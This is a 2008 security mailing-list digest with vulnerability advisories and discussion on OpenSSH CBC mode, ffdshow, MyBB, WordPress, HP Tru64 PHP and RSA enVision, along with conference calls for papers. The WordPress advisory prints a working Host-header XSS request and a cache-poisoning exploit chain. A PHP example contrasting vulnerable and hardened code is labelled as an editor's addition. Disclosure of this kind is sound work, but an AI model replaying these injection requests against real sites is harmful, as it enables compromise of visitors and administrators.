Re: Re: OpenSSH security advisory: cbc.adv
What documents have you been reading? Take a look at the actual vulnerability advisory:

http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txt

Or the original posting by OpenSSH:

http://www.securityfocus.com/archive/1/498558/30/0/threaded

Where is there any condition related to National Security? If you read the vulnerability advisory you would see that the problem is a design flaw in the SSH specification. OpenSSH was merely used as an example of an implementation of SSH written to implement the specification.

It only takes a few seconds to realise that SSH is used in critical systems. We have seen in recent weeks and months that we are all vulnerable to the security of the banking systems. Anyone who uses online banking makes use of systems that include SSH. Do the oil companies have a private network for ordering stocks? What about weather stations or tidal gauges, are they on private networks? Are there any ISPs who don't use remote management?

on 24/11/08 8:04 PM, [EMAIL PROTECTED] wrote:
> Hey! They put a condition because of National Security. Should that mean that they use OpenSSH in National Security-sensitive applications (interesting ;););))? If so, should that mean that they implicitly recognize the very good work done by the community? If so, why not act politely with the community and share knowledge? This would make the software better, so that they could still use it in their applications. How can't they understand that?
>
> Why not just share the knowledge and just ask for some time (fixed amount? or just when a solution will be found) before public release of the details of the attacks? Why not release the details and switch to another system if OpenSSH is not what they need anymore?
>
> So one more entity that just wants to benefit from FOSS, but not contribute...
>
> If I were the developers, then I would just retaliate (humorously) by sending them a similar (fake) contract/NDA, asking them not to use OpenSSH, but to share National Sensitive information. In other words, just ask them to share THEIR knowledge without US providing our tools.
>
> There are some times where I hate the BSD licence, because it does not force people to cooperate! (even if I don't think any other licence would help here...)
>
> My 2 cents and sorry for the off-topic subject...
>
> Cheers
> GM
>
> --
> Guillaume MULLER
> Post-Doc - Sala C2-50
> Laboratório de Técnicas Inteligentes (LTI)
> Depto. Eng. Computação e Sistemas Digitais (PCS)
> Escola Politécnica da Universidade de São Paulo
> Av. Prof. Luciano Gualberto, 158 travessa 3
> 05508-900 - São Paulo - SP - Brasil
> Tel: +55 11 3091 5397
> http://www.lti.pcs.usp.br/~guillaume
Re: OpenSSH security advisory: cbc.adv
On Mon, Nov 24, 2008 at 11:39 PM, Damien Miller [EMAIL PROTECTED] wrote:
> On Mon, 24 Nov 2008, Nick Boyce wrote:
>> Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ?
>
> Yes, the attack is very unlikely to work against an interactive connection. The usage pattern where the attack is most likely to succeed is where an automated connection is configured to retry indefinitely in the event of errors. In this case, it might be possible to recover as much as 14 bits of plaintext per hour [...]
>
>> Given the amount of data pumped down the typical automated connection per hour, this is hardly anything to worry about .. surely ?
>
> That depends on the data that is being transferred. If it includes sensitive information, then this leakage rate might be unacceptable.
>
> [...] We provide this information so you can decide whether this attack is likely to succeed in your environment.

Thanks - I appreciate your post and clarification. To be clear, I wasn't seeking to dispute your original post in any way - rather I figured many of us non-cryptographers would like to be *very* sure exactly what the exposure is, given that a weakness in the SSH protocol is often the cause of much fear, many missed meals and remedial steps taken hurriedly :)

The original CPNI bulletin is less than helpful in stating:

  "The severity is considered to be potentially HIGH due to the 32 bits of plaintext that can be recovered."

leaving me wondering how to reconcile "severity HIGH" with "32 bits of plaintext can be recovered". Ignoring the attack success probability, I glean from your explanation that there is only really a problem if, say, the SSH connection transfers a simple 1, 2, 3 or 4 byte value which reveals a secret.

> at present we do not feel that this issue is serious enough to make an emergency release

Maybe this was always clear, but along with that reassurance I guess you would recommend we all take your stated remedial action:

> [place] the following directive in sshd_config and ssh_config:
>
>   Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc

at the very next maintenance opportunity, on the grounds that it can't hurt, and can only help ? For instance, (and my apologies for not having looked in any detail at possible compatibility issues), would it be fair to say the popular PuTTY-client-with-OpenSSH-server scenario would be fine after the above config change ?

Cheers
Nick Boyce
--
Science is the poetry of reality -- Richard Dawkins
Re: OpenSSH security advisory: cbc.adv
On Mon, 24 Nov 2008, Nick Boyce wrote:
> [ahem] ... Sorry to be dumb, but ...
>
> On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote:
>> Based on the description contained in the CPNI report and a slightly more detailed description forwarded by CERT this issue appears to be substantially similar to a known weakness in the SSH binary packet protocol first described in 2002 by Bellare, Kohno and Namprempre[2]. The new component seems to be an attack that can recover 14 bits of plaintext with a success probability of 2^-14
>
> Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ?
>
> Quick calculator session :
>
>   2^(-18) = 0.03814697265625
>   2^(-14) = 0.6103515625
>
> So there is a vanishingly small probability that a Bad Guy may discover less than 2 characters from my command-line, every time they try this attack. And each time they fail, my connection gets rudely chopped. Two characters won't help them much. They'd need to succeed about ten times per typed command-line to snoop on most of my sessions. This weakness is surely of no conceivable use to a Bad Guy ?

Yes, the attack is very unlikely to work against an interactive connection. The usage pattern where the attack is most likely to succeed is where an automated connection is configured to retry indefinitely in the event of errors. In this case, it might be possible to recover as much as 14 bits of plaintext per hour (assuming a very fast 10 connections per second). Implementing a limit on the number of connection retries (e.g. 256) is sufficient to render the attack infeasible for this case.

> Given the amount of data pumped down the typical automated connection per hour, this is hardly anything to worry about .. surely ?

That depends on the data that is being transferred. If it includes sensitive information, then this leakage rate might be unacceptable.

On the other hand, I expect that most people aren't running automated transfers that will retry enough for the attack to become feasible. We provide this information so you can decide whether this attack is likely to succeed in your environment.

-d
CanSecWest 2009 CFP (March 18-20 2009, Deadline December 8 2008)
Call For Papers

The CanSecWest 2009 CFP is now open. Deadline is December 8th, 2008.

CanSecWest CALL FOR PAPERS

VANCOUVER, Canada -- The tenth annual CanSecWest applied technical security conference - where the eminent figures in the international security industry will get together to share best practices and technology - will be held in downtown Vancouver at the Sheraton Wall Centre on March 18-20, 2009. The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in a series of informative tutorials.

The CanSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and collaborate and socialize with their peers in one of the world's most scenic cities - a short drive away from one of North America's top skiing areas.

The CanSecWest conference will also feature the availability of the Security Masters Dojo expert network security "sensei" instructors, and their advanced, and intermediate, hands-on training courses - featuring small class sizes and practical application exercises to maximize information transfer.

We would like to announce the opportunity to submit papers, and/or lightning talk proposals for selection by the CanSecWest technical review committee. This year we will be doing one hour talks, and some shorter talk sessions.

Please make your paper proposal submissions before December 8th, 2008. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accommodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and speaking background to secwest09 [at] cansecwest.com . Only slides will be needed for the March paper deadline, full text does not have to be submitted - but will be accepted if available. This year we will be opening up the presentation guidelines to include talks not in English (particularly Chinese) which we will offer to translate for the speaker if they are not a native English speaker.

The CanSecWest 2009 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience.

The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products.

Paper proposals should consist of the following information:

 1. Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax).
 2. Employer and/or affiliations.
 3. Brief biography, list of publications and papers.
 4. Any significant presentation and educational experience/background.
 5. Topic synopsis, proposed paper title, and a one paragraph description.
 6. Reason why this material is innovative or significant or an important tutorial.
 7. Optionally, any samples of prepared material or outlines ready.
 8. Will you have full text available or only slides?
 9. Language of preference for submission.
10. Please list any other publications or conferences where this material has been or will be published/submitted.

Please include the plain text version of this information in your email as well as any file, pdf, sxw, ppt, or html attachments.

Please forward the above information to secwest09 [at] cansecwest.com to be considered for placement on the speaker roster, or have your lightning talk scheduled. If you contact anyone else at our organization please ensure you also cc the submission address with your proposal or it may be omitted from the review process.

cheers,
--dr

--
World Security Pros. Cutting Edge Training,
Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)
Good day.

Mon, Nov 24, 2008 at 03:17:05PM +0700, svrt wrote:
> In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability in ffdshow which affects all available internet browsers.
                                                                                                          ^^^

Really? And links, elinks, lynx, dillo and others are affected too? What about my Firefox that (I assume) has no ffdshow code inside it and there are no ffdshow-related plugins coupled to it? Is it vulnerable?

I really appreciate that you're searching for the issues and releasing advisories -- thanks for doing this! But, please, use the appropriate wording, or your advisories will lead to controversial feelings.

Sorry for being a bit bluffy :(

--
Eygene
Re: [SVRT-05-08] Critical BoF vulnerability found in ffdshow affecting all internet browsers (SVRT-Bkis)
The report is for ffdshow, but the referred URL is to ffdshow-tryout. I wonder if they are the same.

Cheers
Nam

On Mon, 24 Nov 2008 15:17:05 +0700 svrt [EMAIL PROTECTED] wrote:
> 1. General Information
>
> ffdshow is a DirectShow filter and VFW codec for many audio and video formats, such as DivX, Xvid and H.264. It is the most popular audio and video decoder on Windows. Besides a stand-alone setup package, ffdshow is often included in almost all codec pack software such as K-lite Codec Pack, XP Codec Pack, Vista Codec Package, Codec Pack All in one, ...
>
> In Oct 2008, SVRT-Bkis has detected a serious buffer overflow vulnerability in ffdshow which affects all available internet browsers. Taking advantage of the flaw, hackers can perform remote attack, inject viruses, steal sensitive information and even take control of the victim's system. Since ffdshow is an open source software (can be found at http://sourceforge.net/projects/ffdshow-tryout), we have contacted the developing team and they have patched the vulnerability in the latest version of ffdshow.
>
> Details : http://security.bkis.vn/?p=277
>
> SVRT Advisory : SVRT-05-08
> Initial vendor notification : 13-11-2008
> Release Date : 24-11-2008
> Update Date : 24-11-2008
> Discovered by : SVRT-Bkis
> Security Rating : Critical
> Impact Remote : Code Execution
> Affected Software : ffdshow ( rev2347 20081123)
>
> 2. Technique Description
>
> The flaw occurs when ffdshow works with a media stream (e.g. http://[website]/test.avi). On parsing an overly long link, ffdshow would encounter a buffer overflow error as the memory is not allocated and controlled well. ffdshow is in fact a codec component for decoding multimedia formats so it must be used via some media player; the default program is Windows Media Player (wmp). Due to this reason, all internet browsers that support wmp plug-in are influenced by this vulnerability, such as Internet Explorer, Firefox, Opera, Chrome...
>
> In order to exploit, hackers trick users into visiting a website containing malicious code. If successful, malicious code would be executed without any users' further interaction. Hackers can then take complete control of the system.
>
> 3. Solution
>
> As for the seriousness of the vulnerability, it has been patched in the latest version of ffdshow by the developing team of the software. Bkis Internetwork Security Center highly recommends that users should update ffdshow to the latest version here:
> http://sourceforge.net/project/showfiles.php?group_id=173941&package_id=199416&release_id=439904
>
> At the moment, there are a lot of software packages packing ffdshow that haven't been updated. On account of this, users should also update to the latest ffdshow versions:
> - K-Lite Codec Pack (latest version).
> - XP Codec Pack (latest version).
> - Vista Codec Package (latest version).
> - Codec Pack All in one (latest version).
> - Storm Codec Pack (latest version).
> - And many other software Codec packages using ffdshow.
>
> In addition, software producers that make use of ffdshow in their products should also update these products with the latest version of ffdshow.
>
> 4. Credits
>
> Thanks Nguyen Anh Tai for working with SVRT-Bkis.
>
> Bach Khoa Internetwork Security Center (BKIS)
> Hanoi University of Technology (Vietnam)
> Email : [EMAIL PROTECTED]
> Website : www.bkav.com.vn
> WebBlog : security.bkis.vn
> Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg

--
Nam
Re: OpenSSH security advisory: cbc.adv
Nick Boyce [EMAIL PROTECTED] wrote:
> [ahem] ... Sorry to be dumb, but ...
>
> On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller [EMAIL PROTECTED] wrote:
>> Based on the description contained in the CPNI report and a slightly more detailed description forwarded by CERT this issue appears to be substantially similar to a known weakness in the SSH binary packet protocol first described in 2002 by Bellare, Kohno and Namprempre [2]. The new component seems to be an attack that can recover 14 bits of plaintext with a success probability of 2^-14
>
> Could someone please help the uncomprehending [i.e. me :-)] understand why or whether this is anything to be worried about at all ?
>
> Quick calculator session :
>
>   2^(-18) = 0.03814697265625
>   2^(-14) = 0.6103515625
>
> So there is a vanishingly small probability that a Bad Guy may discover less than 2 characters from my command-line, every time they try this attack. And each time they fail, my connection gets rudely chopped. Two characters won't help them much. They'd need to succeed about ten times per typed command-line to snoop on most of my sessions. This weakness is surely of no conceivable use to a Bad Guy

You could still use this attack in DoS scenarios. Through those connection terminations the service quality is reduced. You could e.g. lock admins out (prevent security updates, have more time for time-consuming attacks which would otherwise be reset from time to time by admins, ...) or reduce the transmission rate of security logs by machines without hard disk using SSH like a VPN to send logs to some central server, or in general could inhibit many vital processes based on SSH. Thus you could increase your chances of other attacks. And of course you can attack the service ssh itself.

(all those could be prevented by the use of a VPN - but most people won't take this effort if they don't really need to do so and therefore don't have one set up when they would need it)

Best regards
Fabian
MyBB 1.4.3 my_post_key Disclosure Vulnerability
############################################################
# MyBB 1.4.3 my_post_key Disclosure Vulnerability
# by NBBN (http://nbbnsblog.co.cc)
############################################################

Vendor: http://mybboard.net
Date: November 25, 2008

These URLs contain my_post_key. Moderators and admins use these sometimes, depending on what they want to do with a thread. my_post_key is used to perform various actions and to prevent CSRF. These pages show the posts of the users. If some of these posts have pictures, the referrer will be transferred to the server of the images.

# Vuln URLs #

  http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key]
  http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key]
  http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key]

Finally, an attacker has the postkey, and can perform some interesting moderator or administrator actions with CSRF.
New tool and paper for Oracle forensics...
Hey all,

I've just posted a new tool and paper for Oracle forensics. The tool, orablock, allows a forensic investigator to dump data from a "cold" Oracle data file - i.e. there's no need to load up the data file in the database, which would cause the data file to be modified, so using orablock preserves the evidence. Orablock can also be used to locate "stale" data - i.e. data that has been deleted or updated. It can also be used to dump SCNs for data blocks, which can be useful during the examination of a compromised Oracle box. Indeed, this is the subject of the paper "Oracle Forensics Part 7: Using the Oracle System Change Number in Forensic Examinations". Both the tool (which compiles on Linux, Mac OS X and Windows) and the paper are available from http://www.databasesecurity.com/.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
Re: OpenSSH security advisory: cbc.adv
> Maybe this was always clear, but along with that reassurance I guess you would recommend we all take your stated remedial action :
>
>> [place] the following directive in sshd_config and ssh_config:
>>
>>   Ciphers aes128-ctr,aes256-ctr,arcfour256,arcfour,aes128-cbc,aes256-cbc
>
> at the very next maintenance opportunity, on the grounds that it can't hurt, and can only help ?

It can possibly hurt very much - if ctr mode is subject to a different vulnerability. There has been much discussion of ctr mode having *possible* issues, although nothing I know of published directly about ssh.

On the other hand, we have a national security agency who refuses full disclosure, raising a vulnerability and pointing to a switch to counter mode. Perhaps this is to prevent the low likelihood but possible attack they have found, or perhaps it is to encourage a hasty switch to counter mode which is more convenient for national security reasons. I don't honestly know - the only REAL info on the subject I've seen has come from djm. You decide who you trust.

Personally, I won't be making that change hastily anywhere - nothing I have is directly threatened by this attack, so I can wait until someone figures out the gist of it and implements an appropriate countermeasure, and I see some legitimate peer review on the topic as opposed to FUD spreading.

I frankly trust the OpenSSH developers a lot more than I trust ssh.com or a puppet state "no such agency" acting as worn out lapdog for the sorts of people that implement things like the patriot act. People who will not share information with the developers of the software should always be suspect. They have no reason not to without a hidden agenda.

-Bob
[security bulletin] HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01599836
Version: 1

HPSBTU02382 SSRT080132 rev.1 - HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX running PHP, Remote Denial of Service (DoS) or Arbitrary Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-11-25
Last Updated: 2008-11-25

Potential Security Impact: Remote Denial of Service (DoS) or arbitrary code execution.

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in PHP running on the HP Secure Web Server for Tru64 UNIX or Internet Express for Tru64 UNIX. The vulnerability could be exploited remotely to cause a Denial of Service (DoS) or to execute arbitrary code.

References: CVE-2008-3658

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier
HP Internet Express for Tru64 UNIX v 6.8
HP Internet Express for Tru64 UNIX v 6.7
HP Internet Express for Tru64 UNIX v 6.6

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference        Base Vector                    Base Score
  CVE-2008-3658    (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION
HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer until updates are available in mainstream release patch kits. The resolutions contained in the ERP kits are targeted for availability in the following mainstream kit:

HP Internet Express for Tru64 UNIX v 6.9

The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the installation of the ERPs is blocked by any of your installed CSPs.

The ERP kit provides apache-tomcat-5.5.26, apache_1.3.39, httpd-2.2.6, php-4.4.9 sources and licenses.

HP Secure Web Server for Tru64 UNIX v 6.8.0 or earlier, HP Internet Express for Tru64 UNIX v 6.6, v 6.7, or v 6.8
PREREQUISITE: HP Tru64 UNIX v 5.1B-4 PK6 (BL27) or v 5.1B-3 PK5 (BL26)
Name: SWS-681.tar.gz
Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-6.81; show=replace
          http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=SWS-681

MD5 checksums are available from the ITRC patch database main page. From the patch database main page, click Tru64 UNIX, then click "verifying MD5 checksums" under useful links.

PRODUCT SPECIFIC INFORMATION

HISTORY
Version:1 (rev.1) - 25 November 2008 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers
Re: Microsoft VISTA TCP/IP stack buffer overflow
So, let me try and understand this. According to what you have written, and the MSDN documentation on this CreateIpForwardEntry2 call, you need to be (at least) a member of the Administrators group. So how is this security vulnerability any different to me creating a program, which will require the same Administrative rights, to say, wipe the boot configuration file?
RSA EnVision Remote Password Disclosure
I. REFERENCE
Title: RSA EnVision Remote Password Disclosure
URL: http://www.secfault.org/?p=78

II. BACKGROUND
RSA EnVision, a product of RSA Security, is a platform allowing gathering and analysis of security events and logs. RSA Security is a subsidiary company of EMC Corporation.

III. DESCRIPTION
The RSA EnVision platform provides a web console which enables administration of the solution and analysis of security events. A vulnerability exists in this web application, allowing a remote anonymous attacker to retrieve the hash of the password used for authentication. Using a dictionary or a bruteforce attack against this hash, a remote attacker can gain administration privilege on the EnVision web console. This vulnerability is due to a lack of access control on the user profile functionality.

Steps to reproduce: The steps to reproduce the vulnerability will be disclosed November 28 2008.

IV. IMPACT
Successful exploitation allows remote attackers to gain access to the hash of the password used to authenticate users of the web console. Using a dictionary or a bruteforce attack against the retrieved hash, a remote attacker can gain administration privilege on the EnVision web console.

V. PRODUCT AFFECTED
The vulnerability was successfully exploited on enVision v3.7.0 Build: 0169. EMC has reported the following versions to be affected: RSA EnVision 3.5.0, 3.5.1, 3.5.2 and 3.7.0

VI. REMEDIATION
Apply the vendor patch corresponding to your version of RSA EnVision: https://knowledge.rsasecurity.com/

VII. DISCLOSURE TIMELINE
10/30/2008 Initial vendor notification
10/31/2008 Initial vendor response
11/21/2008 Patch release and coordinated public advisory disclosure
11/28/2008 Detailed vulnerability information disclosure

VIII. VENDOR REFERENCE
EMC Security Alert (ESA) identifier : ESA-08-017

IX. CREDIT
This vulnerability was discovered by Nicolas Viot [EMAIL PROTECTED]
Intrinsec is a French company specialized in business continuity and security : http://www.intrinsec.com
WordPress XSS vulnerability in RSS Feed Generator
= noXSS.org Security Advisory == Advisory: WordPress XSS vulnerability in RSS Feed Generator Author: Jeremias Reith [EMAIL PROTECTED] Published: 2008/11/25 Affected: WordPress 2.6.5 Summary === WordPress prior to v2.6.3 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prune to XSS attacks. Web Sites running in a name based virtual hosting setup are not affected as long as they are not the default virtual host. Moreover we only found installations running on the Apache web server to be affected. Vulnerability Details = The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the atom:link tag in ATOM and RSS 2.0 feeds: function self_link() { echo 'http' . ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://' . $_SERVER['HTTP_HOST'] . wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1); } The function does not sanitize the HTTP_HOST variable in any way but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php: $_SERVER = add_magic_quotes($_SERVER); In almost all setups add_magic_quotes() runs mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context. PoC The Apache web server only disallows '/', '\' and '..' within the host header. The header can therefore contain markup making the following PoC possible: curl -H Host: \body onload=alert(String.fromCharCode(88,83,83)) \ http://www.example.org/blog/feed The given example request will return (without additional newlines): -- snip -- ... atom:link href=http://\; body onload=alert(String.fromCharCode(88,83,83)) /blog/feed rel=self type=application/rss+xml / ... -- snip -- The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode. 
Exploit
=======
The following exploit is a semi-stored XSS attack and has been tested with the following setup:

- Apache 2.x with IP-based virtual hosting
- WordPress 2.6.3 installed in /blog/
- WP Super Cache 0.84
- Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static file caching to WordPress. It greatly increases performance and is widely used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically. Issuing a malicious request to a vulnerable WordPress installation therefore causes a file containing the XSS to be generated and placed within the document root.

Request:

    curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \
        http://www.example.org/blog/feed

Generated file:

    http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even though the feed is XML, because the cached file is served as text/html. The only missing step is calculating the cached file's MD5 sum. The following code generates the MD5 checksum:

    php -r 'echo md5("\"><body onload=alert(String.fromCharCode(88,83,83))>" . "/blog/feed"), "\n";'

In the default setup the MD5 sum is computed over the concatenation of HTTP_HOST and REQUEST_URI, resulting in 0d2ca4617758433a7864d57493be2c5b for the given example. This file can be accessed until the cache expiration mechanism removes it. The default expiry time is 3600 seconds.

Vendor Response
===============
2008-11-17 Reported to vendor
2008-11-17 Initial response from vendor
2008-11-25 Release of version 2.6.5
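The escaping mismatch the advisory describes (SQL-style backslash escaping of $_SERVER, then raw interpolation of HTTP_HOST into the feed markup) is reproduced below, together with one way to close it. This is an added example, not code from the advisory, from WordPress or from the 2.6.5 fix: addslashes() stands in for mysql_real_escape_string() (which needs a live MySQL connection but treats '<' and '>' the same way), the $server array is a constructed request environment using the advisory's PoC header, and the function names, the uppercase HTTPS key and the hostname[:port] validation regex are the editor's own assumptions.

```php
<?php
// Added example, not WordPress's or the advisory author's code. It contrasts the
// escaping WordPress 2.6.x applied to $_SERVER (SQL-style backslash escaping via
// add_magic_quotes()) with validation plus output encoding that is safe inside an
// XML/HTML attribute. addslashes() stands in for mysql_real_escape_string(), which
// needs a live MySQL connection; both leave '<', '>' and spaces untouched, which is
// the whole problem. The hardened version is an assumed fix, not the one shipped in 2.6.5.

// Constructed request environment: the Host header from the advisory's PoC plus a feed URI.
$server = [
    'HTTP_HOST'   => '"><body onload=alert(String.fromCharCode(88,83,83))>',
    'REQUEST_URI' => '/blog/feed',
    'HTTPS'       => '',
];

// Vulnerable pattern, mirroring self_link() in wp-includes/feed.php of 2.6.x:
// SQL-escape the host (as add_magic_quotes() did), then drop it straight into markup.
function self_link_vulnerable(array $s): string
{
    $host = addslashes($s['HTTP_HOST']);
    $uri  = htmlspecialchars(stripslashes($s['REQUEST_URI']), ENT_QUOTES);
    return 'http' . ($s['HTTPS'] === 'on' ? 's' : '') . '://' . $host . $uri;
}

// Hardened: refuse any Host value outside the hostname[:port] grammar instead of
// trying to clean it, and HTML-encode what is emitted into the attribute anyway.
// The regex is an assumption for this example (letters, digits, '-', '.', optional port).
function safe_host(string $host): ?string
{
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}(:[0-9]{1,5})?$/', $host)) {
        return null;
    }
    return $host;
}

function self_link_fixed(array $s): ?string
{
    $host = safe_host($s['HTTP_HOST']);
    if ($host === null) {
        return null; // caller should answer 400 Bad Request rather than render a feed
    }
    $uri = htmlspecialchars(stripslashes($s['REQUEST_URI']), ENT_QUOTES);
    return 'http' . ($s['HTTPS'] === 'on' ? 's' : '') . '://'
         . htmlspecialchars($host, ENT_QUOTES) . $uri;
}

function atom_link(string $href): string
{
    return '<atom:link href="' . $href . '" rel="self" type="application/rss+xml" />';
}

// 1. Vulnerable path: the backslash-escaped quote closes href early and <body> becomes live markup.
echo atom_link(self_link_vulnerable($server)), "\n";

// 2. Hardened path with the malicious Host: the request is refused outright.
$fixed = self_link_fixed($server);
echo $fixed === null ? "rejected Host header\n" : atom_link($fixed) . "\n";

// 3. Hardened path with a legitimate Host still produces a normal self link.
$server['HTTP_HOST'] = 'www.example.org';
echo atom_link(self_link_fixed($server)), "\n";
```

Run it with `php` on the command line: the first line printed is the same atom:link element the advisory shows, with the escaped quote terminating href and the injected body tag sitting in live markup; the second line is the rejection, and the third is an ordinary self link for www.example.org. Validating the Host value rather than encoding it is the deliberate choice here, because the name also ends up in the cache filename and in absolute URLs elsewhere in the feed, where attribute encoding alone would not help.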
Re: Microsoft VISTA TCP/IP stack buffer overflow
Administrator lives in Ring 3 while this crash happens in Ring 0. Nobody, not even Admin, should be able to corrupt kernel space. It's not a security issue per se - it's just a bug.

[EMAIL PROTECTED] wrote:
So, let me try and understand this. According to what you have written, and the MSDN documentation on this CreateIpForwardEntry2 call, you need to be (at least) a member of the Administrators group. So how is this security vulnerability any different to me creating a program, which will require the same Administrative rights, to, say, wipe the boot configuration file?
[CFP] FRHACK 01 Call For Papers (save the dates!)
[CFP] FRHACK 01 Call For Papers

FRHACK: By Hackers, For Hackers!
http://www.frhack.org

FRHACK 01 Call For Papers
September 7-8, 2009, at the Great Kursaal Hall of Besançon, France.

Do you like good wine, French bread, food, strikes and the French kiss? If so, you will love FRHACK!

[ - Introduction - ]
FRHACK is the first international IT security conference, by hackers - for hackers, in France! FRHACK is not commercial, but highly technical.

Target audience: security officers, security professionals and product vendors, IT decision makers, policy makers, security, network and firewall administrators, teachers, academic researchers and software developers.

The FRHACK Team (TFT) encourages speakers to present new and interesting projects for FRHACK 01 and will give preferential treatment to submissions that have not been presented at other conferences. Further, TFT invites any individual who has not spoken at a conference before to submit a talk and make FRHACK their inaugural event! TFT encourages girls passionate about IT security to submit papers, as TFT will offer a prize to the best IT security girl of the year to reward innovation.

Papers can be submitted in English and/or French. The conference language is either English or French.

The conference will be held in Besançon, in the east of France close to Switzerland, and aims to bring together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. FRHACK will feature national and international speakers and attendees with a wide range of skills. The atmosphere is favourable to presenting all facets of computer security and will be a great opportunity to network with like-minded people and enthusiasts.
[ - The venue - ]
FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of Besançon, with capacity for up to 1400 people.

[*] About Besançon (taken from http://en.wikipedia.org/wiki/Besan%C3%A7on)
